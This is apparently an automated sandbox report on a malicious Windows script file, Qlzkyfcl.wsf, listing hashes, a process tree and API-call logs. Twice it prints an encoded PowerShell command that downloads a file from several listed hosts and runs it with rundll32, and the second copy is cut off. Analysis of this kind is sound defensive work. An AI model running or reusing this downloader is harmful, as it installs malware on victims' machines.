Summary | ZeroBOX

Qlzkyfcl.wsf

Generic Malware Antivirus AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6401 April 13, 2023, 9:11 a.m. April 13, 2023, 9:18 a.m.
Size 309.0KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 4b62317026915bef2b7980659f5f4b6e
SHA256 6ed4717161130deb2b2c45bc50db865a7e0e54481cf8ef42258f20db702f4167
CRC32 97638CB2
ssdeep 6144:ScBl7vsWZaY1G/QfwXLlBq+iecwQzDEA0nHf/tEcoRUe6rcqrexvzksca4tGp:tfT66BwOqlRvxKnSg
Yara
  • Generic_Malware_Zero - Generic Malware

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Qlzkyfcl.wsf

    2532
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQATgBvAG4AZABlAHAAcgBlAHMAcwBlAGQAUgBvAG0AYgBvAHcAbABpAG4AZQAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAHIAegBiAHAAbwAuAGMAbwBtAC4AYgByAC8AMABNAHEAYQBFAC8AZQBiAEsAVgAxADAALABoAHQAdABwAHMAOgAvAC8AbQBtAGgAaABmAC4AYwBvAG0ALwBjAHkAbwBhAEwAQwBqAC8AbQBYAEIAcgBDAGsAVgBSAFQALABoAHQAdABwAHMAOgAvAC8AZwByAGEAcABoAGkAeABjAHIAZQBhAHQAaQB2AGkAdAB5AC4AYwBvAG0ALwBNAG8ASgBCAFEALwA3AFIANgBrAE4ATQBxAHMAVgBmAHoAcwAsAGgAdAB0AHAAcwA6AC8ALwBzAHQAcgBhAGcAaQBjAGkAYQBuAC4AYwBvAG0ALwB1AHEANgAzAGwALwB2AGIAZwBKAEsAaABaAGwANQBBAGsALABoAHQAdABwAHMAOgAvAC8AcwBvAGEAcgBlAHMAZABlAHMAaQBnAG4AZQByAC4AYwBvAG0ALgBiAHIALwBRAGsAUwB3AHAAOAAvAG8ASgA5AGQARQBpAHoALABoAHQAdABwAHMAOgAvAC8AYQBsAG8AcwB0AG8AbwBsAC0AcwBhAC4AYwBvAG0ALwBYAHMAWABZAG8AZAAvAHIAMABCAEgASwBMAFEASABUAG4ATAAsAGgAdAB0AHAAcwA6AC8ALwBuAGUAdAB1AGwAdAByAGEALgBjAG8AbQAuAGIAcgAvAGIAUwBxAEEATQBpAC8ANgA5ADEAOAByAG0ATQAxAEwAUwAsAGgAdAB0AHAAcwA6AC8ALwBiAHkAdABlAGQAZQBzAGkAZwBuAC4AbgBlAHQALwB2AFAAcQB5AFcAeABiAC8AMAAyADAANAAyADMALgBnAGkAZgAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAAaQBuACAAJABOAG8AbgBkAGUAcAByAGUAcwBzAGUAZABSAG8AbQBiAG8AdwBsAGkAbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA3ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABUAGUAbgBkAGkAbgBlAGEAbABBAHQAdABpAHQAdQBkAGkAbgBpAHoAZQByAC4ATABlAHAAcgBvAHMAZQBCAHUAYwBjAGEAbgBlAGUAcgBpAG4AZwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACwATgBpAGsAbgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

      2672

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e9b60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e99a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e99a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e99a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea3a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea6e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ea620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 1048576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726a1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02971000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02972000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0275a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0276b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02767000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02752000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02765000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0275c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0276c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02753000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02754000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02755000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02756000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02757000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02758000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02759000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b45000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b46000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b47000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b48000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b49000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b4a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b4b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b4c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b4d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b4e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b4f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQATgBvAG4AZABlAHAAcgBlAHMAcwBlAGQAUgBvAG0AYgBvAHcAbABpAG4AZQAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAHIAegBiAHAAbwAuAGMAbwBtAC4AYgByAC8AMABNAHEAYQBFAC8AZQBiAEsAVgAxADAALABoAHQAdABwAHMAOgAvAC8AbQBtAGgAaABmAC4AYwBvAG0ALwBjAHkAbwBhAEwAQwBqAC8AbQBYAEIAcgBDAGsAVgBSAFQALABoAHQAdABwAHMAOgAvAC8AZwByAGEAcABoAGkAeABjAHIAZQBhAHQAaQB2AGkAdAB5AC4AYwBvAG0ALwBNAG8ASgBCAFEALwA3AFIANgBrAE4ATQBxAHMAVgBmAHoAcwAsAGgAdAB0AHAAcwA6AC8ALwBzAHQAcgBhAGcAaQBjAGkAYQBuAC4AYwBvAG0ALwB1AHEANgAzAGwALwB2AGIAZwBKAEsAaABaAGwANQBBAGsALABoAHQAdABwAHMAOgAvAC8AcwBvAGEAcgBlAHMAZABlAHMAaQBnAG4AZQByAC4AYwBvAG0ALgBiAHIALwBRAGsAUwB3AHAAOAAvAG8ASgA5AGQARQBpAHoALABoAHQAdABwAHMAOgAvAC8AYQBsAG8AcwB0AG8AbwBsAC0AcwBhAC4AYwBvAG0ALwBYAHMAWABZAG8AZAAvAHIAMABCAEgASwBMAFEASABUAG4ATAAsAGgAdAB0AHAAcwA6AC8ALwBuAGUAdAB1AGwAdAByAGEALgBjAG8AbQAuAGIAcgAvAGIAUwBxAEEATQBpAC8ANgA5ADEAOAByAG0ATQAxAEwAUwAsAGgAdAB0AHAAcwA6AC8ALwBiAHkAdABlAGQAZQBzAGkAZwBuAC4AbgBlAHQALwB2AFAAcQB5AFcAeABiAC8AMAAyADAANAAyADMALgBnAGkAZgAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAAaQBuACAAJABOAG8AbgBkAGUAcAByAGUAcwBzAGUAZABSAG8AbQBiAG8AdwBsAGkAbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA3ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABUAGUAbgBkAGkAbgBlAGEAbABBAHQAdABpAHQAdQBkAGkAbgBpAHoAZQByAC4ATABlAHAAcgBvAHMAZQBCAHUAYwBjAGEAbgBlAGUAcgBpAG4AZwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZ